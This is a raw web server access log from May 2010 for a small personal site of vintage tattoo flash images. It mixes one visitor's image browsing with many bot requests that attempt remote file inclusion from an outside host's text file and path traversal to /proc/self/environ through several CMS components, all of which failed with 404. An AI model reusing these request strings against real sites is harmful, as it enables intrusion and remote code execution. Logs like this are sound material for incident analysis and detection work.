88.191.94.188 - - [30/May/2010:21:38:30 -0500] "GET /logs/access_log.1270857600//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
88.191.94.188 - - [30/May/2010:21:38:32 -0500] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
88.191.94.188 - - [30/May/2010:21:38:32 -0500] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
88.191.94.188 - - [30/May/2010:21:38:32 -0500] "GET /logs/access_log.1270857600//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
120.50.40.133 - - [30/May/2010:21:38:42 -0500] "GET ///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.831"
120.50.40.133 - - [30/May/2010:21:38:47 -0500] "GET ////index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.831"
88.191.94.188 - - [30/May/2010:21:38:52 -0500] "GET /logs/access_log.1263081600//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
88.191.94.188 - - [30/May/2010:21:38:53 -0500] "GET /logs/access_log.1263081600//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 354 "-""Mozilla/5.0"
120.50.40.133 - - [30/May/2010:21:39:13 -0500] "GET ///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.831"
200.43.180.250 - - [30/May/2010:21:41:39 -0500] "GET ///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.834"
200.43.180.250 - - [30/May/2010:21:43:17 -0500] "GET ///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.834"
91.121.201.191 - - [30/May/2010:21:44:20 -0500] "GET /logs/access_log.1273363200///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.803"
91.121.201.191 - - [30/May/2010:21:44:20 -0500] "GET ///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.803"
91.121.201.191 - - [30/May/2010:21:44:20 -0500] "GET /logs///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.803"
91.121.201.191 - - [30/May/2010:21:44:24 -0500] "GET /logs/access_log.1273017600///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.803"
94.23.0.30 - - [30/May/2010:21:46:02 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [30/May/2010:21:46:03 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
193.41.235.46 - - [30/May/2010:21:46:03 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [30/May/2010:21:46:03 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
89.145.108.230 - - [30/May/2010:21:46:16 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [30/May/2010:21:46:16 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
80.233.172.42 - - [30/May/2010:21:46:33 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [30/May/2010:21:46:33 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
69.175.75.82 - - [30/May/2010:21:46:36 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.75.82 - - [30/May/2010:21:46:36 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
193.41.235.46 - - [30/May/2010:21:46:57 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [30/May/2010:21:46:57 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
89.145.108.230 - - [30/May/2010:21:46:58 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [30/May/2010:21:46:58 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
69.175.75.82 - - [30/May/2010:21:47:14 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.75.82 - - [30/May/2010:21:47:14 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
192.167.114.31 - - [30/May/2010:21:47:14 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
192.167.114.31 - - [30/May/2010:21:47:15 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.820"
80.233.172.42 - - [30/May/2010:21:47:16 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
91.121.201.191 - - [30/May/2010:21:47:16 -0500] "GET /logs/access_log.1273363200///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.803"
80.233.172.42 - - [30/May/2010:21:47:17 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
91.121.201.191 - - [30/May/2010:21:47:17 -0500] "GET ///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.803"
91.121.201.191 - - [30/May/2010:21:47:17 -0500] "GET /logs///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.803"
91.121.201.191 - - [30/May/2010:21:47:18 -0500] "GET /logs/access_log.1273017600///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.803"
94.23.0.30 - - [30/May/2010:21:47:29 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [30/May/2010:21:47:29 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
193.41.235.46 - - [30/May/2010:21:47:36 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [30/May/2010:21:47:37 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
192.167.114.31 - - [30/May/2010:21:48:14 -0500] "GET /logs/*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
192.167.114.31 - - [30/May/2010:21:48:14 -0500] "GET /*.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.820"
74.233.40.215 - - [30/May/2010:21:48:30 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__ZQW5tDuHd7NH9hPEBuRT8827w9Y=&h=364&w=405&sz=67&hl=en&start=10&sig2=5vIFRhuOveXvH0fdaLTxvQ&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%2Bflash%26hl%3Den%26client%3Dsafari%26tbs%3Disch:1&ei=iCMDTJqDH8T38Aa-5cGcDQ""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:48:31 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:48:31 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:48:31 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:48:31 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:48:31 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:40 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:40 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:40 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:40 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:40 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:40 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:40 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:40 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:40 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:48 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:48 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:48 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:48 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:48 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:49 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:49 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:50 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:50 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:50 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:50 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:55 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:55 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:55 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:55 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:55 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:55 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:55 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:56 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:56 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:56 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:49:57 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:50:05 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:50:05 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:50:05 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:50:05 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:50:05 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:50:05 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:50:05 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:50:05 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:50:05 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:50:06 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:50:12 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:50:13 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:50:13 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:50:13 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:50:17 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:50:17 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
221.187.46.166 - - [30/May/2010:21:50:22 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""hoge (co2h2onacl@gmail.com)"
221.187.46.166 - - [30/May/2010:21:50:28 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""hoge (co2h2onacl@gmail.com)"
74.233.40.215 - - [30/May/2010:21:50:56 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tat-cd1.jpg""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
74.233.40.215 - - [30/May/2010:21:51:02 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
209.216.201.8 - - [30/May/2010:21:51:07 -0500] "GET /logs//box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-""libwww-perl/5.814"
209.216.201.8 - - [30/May/2010:21:51:07 -0500] "GET //box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.814"
